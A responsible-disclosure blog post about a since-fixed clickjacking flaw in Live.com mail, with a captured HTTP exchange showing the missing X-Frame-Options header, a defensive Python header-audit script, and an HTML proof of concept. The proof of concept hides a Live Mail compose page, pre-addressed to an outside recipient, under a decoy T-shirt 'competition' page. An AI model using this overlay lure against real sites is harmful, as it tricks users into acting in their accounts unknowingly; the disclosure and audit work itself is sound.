On 7/29/13 I reported a Live.com XFO (X-Frame-Options) vulnerability to the Microsoft Security team; their investigation has finally concluded and the bug has been fixed. So here are the details of the bug and the timeline of the fix. A year ago, on a weekend, I started digging into MS services for bugs, and this vulnerability seemed the most interesting one to share on Garage4Hackers.
Timeline of the investigation of the bug: July 29, 2013 – April 16, 2014.
The interesting part of the vulnerability: all pages were protected against UI redressing (clickjacking) attacks, and when testing I normally test the application on all browsers. Here is the weird part: I was able to iframe all the pages of Live.com, including pre-authentication and post-authentication pages, on Mozilla Firefox 3.6.28 through Mozilla Firefox 6. On Chrome and the other browsers the XFO protection worked perfectly on all pages.
Random announcement, nothing to do with this post: check out the recorded video of the Garage4Hackers Ranchoddas Webcast Series – Browser Crash Analysis by David Rude II aka Bannedit.
Note: have a look at the same vulnerability on Facebook Application Installing.
Obviously, you must be wondering why this happens with Mozilla. After doing some research and consulting with the G4H team, I concluded that it may be an issue with the Gecko engine. The test environment was Windows 7 and Ubuntu 10, 11 and 12.
Note: if you have stumbled upon the same issue with Gecko, please reply on this thread.
Check out the following headers; the XFO header is missing on Gecko/20120306 Firefox/3.6.28 through Firefox 6.
https://blu166.mail.live.com/m/?bfv=wm

GET /m/?bfv=wm HTTP/1.1
Host: blu166.mail.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie:

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Content-Encoding: gzip
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Wlp-StartTime: 29-07-2013 10:10:32 AM
xxn: 22
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
MSNSERVER: H: BLU166-W22 V: 17.1.6722.6001 D: 2013-07-22T22:56:20
X-Powered-By: ASP.NET
Content-Length: 3113
Date: Mon, 29 Jul 2013 10:10:32 GMT
Connection: keep-alive
Set-Cookie: bfv=wm; domain=.live.com; path=/
Set-Cookie: widecontext=X; path=/; secure
Set-Cookie: domain=.live.com; path=/
Set-Cookie: xidseq=7; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Mon, 29-Jul-2013 08:30:32 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate, no-transform
Pragma: no-cache
Expires: -1, -1
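As an added example (not from the original post, nor Microsoft's or Garage4Hackers' code), here is a small Python audit that parses raw HTTP responses and flags the pattern the capture above shows: framing protection present for one User-Agent and absent for another. The `fetch` callable is hypothetical (plug in any HTTP client), and the two sample responses are constructed for offline use; only the Firefox 3.6.28 User-Agent string is taken from the capture.

```python
import re

UA_FIREFOX_3628 = ("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.28) "
                   "Gecko/20120306 Firefox/3.6.28")
UA_CHROME = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.72 Safari/537.36"

def parse_headers(raw):
    """Return {lowercase-name: [values]} from a raw HTTP response (status line + headers)."""
    head = raw.split("\r\n\r\n", 1)[0].replace("\r\n", "\n")
    headers = {}
    for line in head.split("\n")[1:]:          # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers

def framing_protection(headers):
    """'xfo' or 'csp' if an effective anti-framing control is present, else None."""
    for v in headers.get("x-frame-options", []):
        v = v.strip().upper()
        if v in ("DENY", "SAMEORIGIN") or v.startswith("ALLOW-FROM"):
            return "xfo"
    for v in headers.get("content-security-policy", []):
        if re.search(r"(^|;)\s*frame-ancestors\b", v, re.I):
            return "csp"
    return None                                 # e.g. ALLOWALL or no header at all

def audit(fetch, user_agents):
    """fetch(ua) -> raw response. Returns per-UA result and whether protection varies by UA."""
    results = {ua: framing_protection(parse_headers(fetch(ua))) for ua in user_agents}
    inconsistent = len({r is None for r in results.values()}) > 1
    return results, inconsistent

# Constructed offline samples: the Firefox response mirrors the capture above (no XFO);
# the Chrome response shows what a correctly protected page would return.
SAMPLE = {
    UA_FIREFOX_3628: ("HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                      "Server: Microsoft-IIS/7.5\r\nX-Powered-By: ASP.NET\r\n\r\n<html>"),
    UA_CHROME: ("HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                "X-Frame-Options: DENY\r\nServer: Microsoft-IIS/7.5\r\n\r\n<html>"),
}

def sample_audit():
    """Run the audit against the constructed samples (swap in a real HTTP client for fetch)."""
    return audit(SAMPLE.__getitem__, [UA_FIREFOX_3628, UA_CHROME])

if __name__ == "__main__":
    print(sample_audit())
```

Running the audit with a long list of browser User-Agent strings against every page of an application is the quickest way to catch protection that is only emitted for some clients.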
Here are some screenshots of basic operations on live.com (I would like to remind you that every page of live.com was vulnerable):
The page the attacker built to attack the victim.
Composing email:
Uploading an attachment:
Deleting emails:
Screenshot: https://dl.dropboxusercontent.com/u/18007092/ms-click4.png
HTML POC, which I sent to the MS Security Team:
<html>
<!-- Quickly developed POC, for testing purposes -->
<!-- Visit Garage4hackers.com -->
<head>
<title> Live Mail Send Clickjacking - Garage4hackers.com </title>
<style>
iframe {
  width:800px;
  height:800px;
  position:absolute;
  top:0;
  left:0;
  filter:alpha(opacity=50); /* in real life opacity=0 */
  opacity:0.5;
}
</style>
</head>
<body>
<br> <br> <br> <br> <br> <br> <br> <br>
<div><center>Bhag Milkha Bhag Competition</center></div>
<center><b>Click Connect, You will Bhag Milkha Bhag T-shirts. </b></center>
<iframe src="https://blu166.mail.live.com/m/compose.m/?fid=00000000-0000-0000-0000-000000000001&to=sandeepk.l337@gmail.com"></iframe>
<a href="http://www.google.com" target="_blank" style="position: relative; left: 0px; top: 220px; z-index: -1;">Connect</a>
</body>
</html>
Let me know if you have any questions about this bug.
– [S]